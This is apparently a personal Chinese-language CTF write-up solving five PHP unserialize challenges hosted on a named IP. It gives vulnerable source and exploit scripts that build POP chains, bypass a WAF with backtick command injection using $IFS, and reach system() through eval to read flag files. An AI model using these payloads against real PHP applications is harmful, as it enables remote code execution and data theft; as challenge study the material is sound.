[关闭]
@shaobaobaoer 2020-12-09T06:39:55.000000Z 字数 6079 阅读 578

在此处输入标题

未分类

在此输入正文> 发现了一个站 http://106.14.114.127/ 准备做做里面的题目

29001

  1. <?php  
  2. @error_reporting(1); 
  3. include 'flag.php';
  4. class baby 
  5. {   
  6.     protected $skyobj;  
  7.     public $aaa;
  8.     public $bbb;
  9.     function __construct() 
  10.     {      
  11.         $this->skyobj = new sec;
  12.     }  
  13.     function __toString()      
  14.     {          
  15.         if (isset($this->skyobj))  
  16.             return $this->skyobj->read();      
  17.     }  
  18. }  
  20. class cool 
  21. {    
  22.     public $filename;     
  23.     public $nice;
  24.     public $amzing; 
  25.     function read()      
  26.     {   
  27.         $this->nice = unserialize($this->amzing);
  28.         $this->nice->aaa = $sth;
  29.         if($this->nice->aaa === $this->nice->bbb)
  30.         {
  31.             $file = "./{$this->filename}";        
  32.             if (file_get_contents($file))         
  33.             {              
  34.                 return file_get_contents($file); 
  35.             }  
  36.             else 
  37.             { 
  38.                 return "you must be joking!"; 
  39.             }    
  40.         }
  41.     }  
  42. }  
  44. class sec 
  45. {  
  46.     function read()     
  47.     {          
  48.         return "it's so sec~~";      
  49.     }  
  50. }  
  52. if (isset($_GET['data']))  
  53. { 
  54.     $Input_data = unserialize($_GET['data']);
  55.     echo $Input_data; 
  56. } 
  57. else 
  58. { 
  59.     highlight_file("./index.php"); 
  60. } 
  61. ?>

思路写在EXP里了。

  1. class cool
  2. {
  3.     public $filename;
  4.     public $nice;
  5.     public $amzing;
  7.     function __construct()
  8.     {
  9.         $this->filename = "flag.php";
  10.     }
  11. }
  14. class baby
  15. {
  16.     protected $skyobj;
  17.     public $aaa;
  18.     public $bbb;
  20.     function set_skyobj($obj)
  21.     {
  22.         $this->skyobj = $obj;
  23.     }
  24. }
  26. # 构造amazing
  27. $am = new baby();
  28. //$am->aaa = "123";
  29. $am->bbb = &$am->aaa;
  30. $am_str = serialize($am);
  32. # 构造 baby
  33. $ba = new baby();
  34. $_c = new cool();
  35. $_c->amzing = $am_str;
  36. $ba->set_skyobj($_c);
  38. # 打印baby
  39. var_dump($ba);
  40. echo serialize($ba).PHP_EOL;
  41. echo urlencode(serialize($ba));

29002

  1. <?php
  2. error_reporting(0);
  3. class come{
  4.     private $method;
  5.     private $args;
  6.     function __construct($method, $args) {
  7.         $this->method = $method;
  8.         $this->args = $args;
  9.     }
  10.     function __wakeup(){
  11.         foreach($this->args as $k => $v) {
  12.             $this->args[$k] = $this->waf(trim($v));
  13.         }
  14.     }
  15.     function waf($str){
  16.         $str=preg_replace("/[<>*;|?\n ]/","",$str);
  17.         $str=str_replace('flag','',$str);
  18.         return $str;
  19.     }
  20.     function echo($host){
  21.         system("echo $host");
  22.     }
  23.     function __destruct(){
  24.          if (in_array($this->method, array("echo"))) {
  25.             call_user_func_array(array($this, $this->method), $this->args);
  26.         }
  27.     }
  29. }
  31. $first='hi';
  32. $var='var';
  33. $bbb='bbb';
  34. $ccc='ccc';
  35. $i=1;
  36. foreach($_GET as $key => $value) {
  37.         if($i===1)
  38.         {
  39.             $i++;
  40.             $$key = $value;
  41.         }
  42.         else{break;}
  43. }
  44. if($first==="doller")
  45. {
  46.     @parse_str($_GET['a']);
  47.     if($var==="give")
  48.         {
  49.         if($bbb==="me")
  50.         {
  51.             if($ccc==="flag")
  52.             {
  53.                 echo "<br>welcome!<br>";
  54.                 $come=@$_POST['come'];
  55.                 unserialize($come);
  56.             }
  57.         }
  58.         else
  59.         {echo "<br>think about it<br>";}
  60.     }
  61.     else
  62.     {
  63.         echo "NO";
  64.     }
  67. }
  68. else
  69. {
  70.     echo "Can you hack me?<br>";
  71.     highlight_file(__FILE__);
  72. }
  74. ?>

exp

  1. <?php
  3. class come
  4. {
  5.     private $method;
  6.     private $args;
  8.     function __construct($method, $args)
  9.     {
  10.         $this->method = $method;
  11.         $this->args = $args;
  12.     }
  13. }
  15. $a = new come("echo", array("`ls\$IFS/`"));
  16. echo urlencode(serialize($a)).PHP_EOL;
  17. echo urlencode("var=give&bbb=me&ccc=flag");

图片标题

之后改为

  1. $a = new come("echo", array("`cat\$IFS/flaflagg`"));

即可获得

29003

  1. <?php
  3. include 'flag.php';
  4. error_reporting(0);
  5. highlight_file(__FILE__);
  8. class P {
  9.     private $var;
  11.     function __invoke(){
  12.         eval(
  13.             'global '.$this -> var.';'.
  14.             '$ret = '.$this -> var.';'
  15.         );
  16.         return $ret;
  17.     }
  18. }
  21. class K {
  22.     protected $fn;
  23.     public $name;
  25.     function __toString(){
  26.         $fn = $this -> fn;
  27.         return $fn();
  28.     }
  29. }
  32. class U {
  33.     public $obj;
  35.     function __wakeup(){
  36.         if (!isset($this->obj->name) || $this->obj->name != "iv4n") {
  37.             $this -> obj -> fn = function(){};
  38.         }
  39.     }
  40. }
  43. echo unserialize($_POST['obj'])->obj;

EXP如下

  1. <?php
  3. //include 'flag.php';
  4. //error_reporting(0);
  5. //highlight_file(__FILE__);
  8. class P
  9. {
  10.     private $var;
  12.     function __set($property_name, $value)
  13.     {
  14.         $this->$property_name = $value;
  15.     }
  16. }
  19. class K
  20. {
  21.     protected $fn; # $fn = new P()
  22.     public $name;
  24.     function __construct($name)
  25.     {
  26.         $this->name = $name;
  27.     }
  29.     function __set($property_name, $value)
  30.     {
  31.         $this->$property_name = $value;
  32.     }
  33. }
  36. class U
  37. {
  38.     public $obj;
  40. }
  43. $obj = new K("iv4n");
  44. $obj_p = new P();
  45. //$obj_p->var = "\$GLOBALS;\$ret=system('ls')";
  46. // Dockerfile flag.php index.php run.sh run.sh
  47. $obj_p->var = "\$GLOBALS;\$ret=system('cat flag.php')";
  48. $obj->fn = $obj_p;
  49. $obj_u = new U();
  50. $obj_u->obj = $obj;
  51. var_dump(
  52.     $obj_u
  53. );
  54. echo urlencode(serialize($obj_u));
  55. # <?php
  56. //$flag = "flag{0k_y0u_4lr3ady_kn0w_uns3ria1ize}";

29004

  1. <?php
  2. require_once "flag.php";
  3. class TOPA{
  4.     public $token;
  5.     public $ticket;
  6.     public $username;
  7.     public $password;
  8.     function login(){
  9.         if($this->username =='aaaaaaaaaaaaaaaaa' && $this->password == 'bbbbbbbbbbbbbbbbbb'){
  10.             return 'key is:{'.$this->token.'}';
  11.         }
  12.     }
  13. }
  14. class TOPB{
  15.     public $obj;
  16.     public $attr;
  17.     function __construct(){
  18.         $this->attr = null;
  19.         $this->obj = null;
  20.     }
  21.     function __toString(){
  22.         $this->obj = unserialize($this->attr);
  23.         $this->obj->token = $GLOBALS["flag"];
  24.         if($this->obj->token === $this->obj->ticket){
  25.             var_dump($this->obj);
  26.             return 'you get flag!';
  27.         }
  28.     }
  29. }
  30. class TOPC{
  31.     public $obj;
  32.     public $attr;
  33.     function __destruct(){
  34.         echo $this->attr;
  35.     }
  36. }
  38. if(isset($_GET['a'])) unserialize($_GET['a']);
  39. else highlight_file(__FILE__);

套路和之前一样

  1. <?php
  3. class TOPA
  4. {
  5.     public $token;
  6.     public $ticket;
  7.     public $username;
  8.     public $password;
  10.     function __construct()
  11.     {
  12.         $this->token = 123;
  13.         $this->ticket = &$this->token;
  14.         $this->username = 'aaaaaaaaaaaaaaaaa';
  15.         $this->password = 'bbbbbbbbbbbbbbbbbb';
  16.     }
  17. }
  19. class TOPB
  20. {
  21.     public $obj;
  22.     public $attr;
  24.     function __construct()
  25.     {
  26.         $this->attr = null;
  27.         $this->obj = null;
  28.     }
  30.     function __toString()
  31.     {
  32.         $this->obj = unserialize($this->attr); # this->obj = new TOPA()
  33.         $this->obj->token = $GLOBALS["flag"];
  34.         if ($this->obj->token === $this->obj->ticket) {
  35.             var_dump($this->obj);
  36.             return 'you get flag!';
  37.         }
  38.     }
  39. }
  41. class TOPC
  42. {
  43.     public $obj;
  44.     public $attr;
  46.     function __destruct()
  47.     {
  48.         echo $this->attr; # this->attr = new TOPB()
  49.     }
  50. }
  52. //unserialize($_GET['a']);
  54. $C = new TOPC();
  55. $B = new TOPB();
  56. $A = new TOPA();
  57. $B->attr = $A;
  58. $C->attr = $B;
  60. //var_dump($C);
  61. //echo serialize($C).PHP_EOL;
  62. echo urlencode(serialize($C));

29005

  1. index.php解析开始
  2. <?php
  3. error_reporting(1);
  4. class Read {
  5.     private $var;
  6.     public function file_get($value)
  7.     {
  8.         $text = base64_encode(file_get_contents($value));
  9.         return $text;
  10.     }
  12.     public function __invoke(){
  13.         $content = $this->file_get($this->var);
  14.         echo $content;
  15.     }
  16. }
  18. class Show
  19. {
  20.     public $source;
  21.     public $str;
  22.     public function __construct($file='index.php')
  23.     {
  24.         $this->source = $file;
  25.         echo $this->source.'解析开始'."<br>";
  26.     }
  28.     public function __toString()
  29.     {
  30.         $this->str['str']->source;
  31.     }
  33.     public function __set($key,$value)
  34.     {
  35.         $this->$key = $value;
  36.     }
  38.     public function _show()
  39.     {
  40.         if(preg_match('/http|https|file:|gopher|dict|\.\.|fllllllaaaaaag/i',$this->source)) {
  41.             die('hacker!');
  42.         } else {
  43.             highlight_file($this->source);
  44.         }
  46.     }
  48.     public function __wakeup()
  49.     {
  50.         if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
  51.             echo "hacker~";
  52.             $this->source = "index.php";
  53.         }
  54.     }
  55. }
  57. class Test
  58. {
  59.     public $params;
  60.     public function __construct()
  61.     {
  62.         $this->params = array();
  63.     }
  65.     public function __get($key)
  66.     {
  67.         $func = $this->params;
  68.         return $func();
  69.     }  
  70. }
  72. if(isset($_GET['chal']))
  73. {
  74.     $chal = unserialize($_GET['chal']);
  75. }
  76. else
  77. {
  78.     $show = new Show('index.php');
  79.     $show->_show();
  80. }
  81. ?>
添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注